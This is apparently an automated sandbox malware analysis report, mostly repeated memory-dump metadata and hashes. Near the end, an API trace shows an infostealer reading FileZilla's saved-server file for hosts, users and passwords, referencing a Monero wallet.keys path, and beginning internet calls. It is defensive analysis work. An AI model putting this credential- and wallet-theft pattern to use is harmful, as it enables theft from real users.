                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &|x$v\_
                              • API String ID: 0-2058981586
                              • Opcode ID: 8a685159066578bdff9fbe6b24483568c5b05411a80007f2604fc6d2ddb2c04e
                              • Instruction ID: 44f0d559a232d966639805f111be18777e83cd68ed5788e225766e67382e1c77
                              • Opcode Fuzzy Hash: 8a685159066578bdff9fbe6b24483568c5b05411a80007f2604fc6d2ddb2c04e
                              • Instruction Fuzzy Hash: D0B207F360C2049FE304AE2DEC8567AB7E9EF94720F1A493DE6C5C3744EA3598058697
                              Function 00877C8F Relevance: 2.2, Strings: 1, Instructions: 932COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ppU|
                              • API String ID: 0-2163573718
                              • Opcode ID: 55e8b482c9de3ed07ba4af7614219345d6ad43ab630a0c6ee703b605212e1667
                              • Instruction ID: 67d54ea1c415d7be68496747b960fe2b73f25830f5e7244a706e332e6eea92c5
                              • Opcode Fuzzy Hash: 55e8b482c9de3ed07ba4af7614219345d6ad43ab630a0c6ee703b605212e1667
                              • Instruction Fuzzy Hash: 4D52D4F360C600AFE7046E29EC8567AFBE5EFD4720F1A893DE6C4C7744EA3558018696
                              Function 007794BA Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: @?r
                              • API String ID: 0-3171989146
                              • Opcode ID: 1d9954b8e28e44c41c70730d6183f49413cb645cc386e3c588b7dc42bc924125
                              • Instruction ID: 9fe0b787edf19d6e2d19a67288d0978589ec1757d268ac5a1da51a12706aee2e
                              • Opcode Fuzzy Hash: 1d9954b8e28e44c41c70730d6183f49413cb645cc386e3c588b7dc42bc924125
                              • Instruction Fuzzy Hash: 955168B7A181289BE3046D2CDC15B7BB7D9DB90210F2A823DED84D7784EE25D9058292
                              Function 0071CE54 Relevance: .2, Instructions: 193COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 341ddd680c8637d0e42298dafee762f40e87829eaa3c0d6822e2e4cf37f8d005
                              • Instruction ID: 401f36a857cbe712d6920d533a514fffbe665468c63863eedfa5f7d33a4b3183
                              • Opcode Fuzzy Hash: 341ddd680c8637d0e42298dafee762f40e87829eaa3c0d6822e2e4cf37f8d005
                              • Instruction Fuzzy Hash: 69516DB3A1C2008FE308AE2CDC8577AB7E5EB98720F16453DE6C5D7744E9355D058786
                              Function 0072C431 Relevance: .2, Instructions: 189COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ef4d96188ddacad7804925571994990d1937dcf36e17a611642de5933d2b84e3
                              • Instruction ID: 7d1fdb3af95a981f19f2f2b053253ceb52ac4e2605fce2b579b156f2662e2459
                              • Opcode Fuzzy Hash: ef4d96188ddacad7804925571994990d1937dcf36e17a611642de5933d2b84e3
                              • Instruction Fuzzy Hash: B05125F3E086144BF300A969EC84356B2D6AB94320F1B463CDF98E7385E97C5C06828A
                              Function 007255AD Relevance: .2, Instructions: 160COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 61f94859c4e5383586b8161c16f4881fe3f2046b677c99e1038114dabb5a8583
                              • Instruction ID: c41fdfff6671da12650806fdc3571133791389010a7262af2e67d26df94a75f2
                              • Opcode Fuzzy Hash: 61f94859c4e5383586b8161c16f4881fe3f2046b677c99e1038114dabb5a8583
                              • Instruction Fuzzy Hash: 0E414AF3E043185BE310793DED8536BBBDA9BD0750F2A4238DF8453B88F97569098196
                              Function 008226C1 Relevance: .2, Instructions: 150COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b667aa201ed90247e32915dbadf8959fe8abb933cf4acd88404429a7b7278ae3
                              • Instruction ID: 01bdbd10f48bfba7a77ec287578f2dc6fc0e4104172e65b08380cb33074b3284
                              • Opcode Fuzzy Hash: b667aa201ed90247e32915dbadf8959fe8abb933cf4acd88404429a7b7278ae3
                              • Instruction Fuzzy Hash: A74139F3A081046BE318592DEC557BB77DADBD4320F1E853DEB99D3780E93988018296
                              Function 0078E5D1 Relevance: .1, Instructions: 146COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7a9f89480776b9401729e3160dfe2c7c90a33d873550bb789b21f258da10741b
                              • Instruction ID: 76a4662b52ebee803b1eac66eeb791c834aa5d1aca612c54159d691f06c36c04
                              • Opcode Fuzzy Hash: 7a9f89480776b9401729e3160dfe2c7c90a33d873550bb789b21f258da10741b
                              • Instruction Fuzzy Hash: 804106F3D196209BE7046E28EC457AABBE5EB50320F1B053DEAD4E7780DA359C4087C6
                              Function 0084430B Relevance: .1, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 24a775c3d763bbdefc40b8a9aad68b55b7d7a541d7906261f37db850d0afd5b6
                              • Instruction ID: 14805a77fd10fa150807af5d52602fac0cad7d94f9e2aa137aef611702a8f676
                              • Opcode Fuzzy Hash: 24a775c3d763bbdefc40b8a9aad68b55b7d7a541d7906261f37db850d0afd5b6
                              • Instruction Fuzzy Hash: C23147B39082149FE3107D3DDC496AAFBDADB94720F1B063ED5D497784ED3599008682
                              Function 004C9750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 004C0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004C8E0B
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004B99EC
                                • Part of subcall function 004B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004B9A11
                                • Part of subcall function 004B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004B9A31
                                • Part of subcall function 004B99C0: ReadFile.KERNEL32(000000FF,?,00000000,004B148F,00000000), ref: 004B9A5A
                                • Part of subcall function 004B99C0: LocalFree.KERNEL32(004B148F), ref: 004B9A90
                                • Part of subcall function 004B99C0: CloseHandle.KERNEL32(000000FF), ref: 004B9A9A
                                • Part of subcall function 004C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004C8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,004D0DBA,004D0DB7,004D0DB6,004D0DB3), ref: 004C0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 004C0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 004C03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 004C0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004C0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 004C0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 004C0571
                              • lstrcat.KERNEL32(?,url: ), ref: 004C0580
                              • lstrcat.KERNEL32(?,00000000), ref: 004C0593
                              • lstrcat.KERNEL32(?,004D1678), ref: 004C05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 004C05B5
                              • lstrcat.KERNEL32(?,004D167C), ref: 004C05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 004C05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 004C05E6
                              • lstrcat.KERNEL32(?,004D1688), ref: 004C05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 004C0604
                              • lstrcat.KERNEL32(?,00000000), ref: 004C0617
                              • lstrcat.KERNEL32(?,004D1698), ref: 004C0626
                              • lstrcat.KERNEL32(?,004D169C), ref: 004C0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 111f9c649efe7d23c582fb10776b3eb9916d53b55fe3f7320a670adbd1a0d712
                              • Instruction ID: 5de3986f69dff43bcae35525e14d23c13b52f5c7c9fef772397ae5c7dbe28170
                              • Opcode Fuzzy Hash: 111f9c649efe7d23c582fb10776b3eb9916d53b55fe3f7320a670adbd1a0d712
                              • Instruction Fuzzy Hash: 5ED14CB9900108ABCB44FBE1DD96FFE7339AF14308F50441EF506A6191DE78AA16CB79
                              Function 004B5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004B4839
                                • Part of subcall function 004B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004B4849
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004B59F8
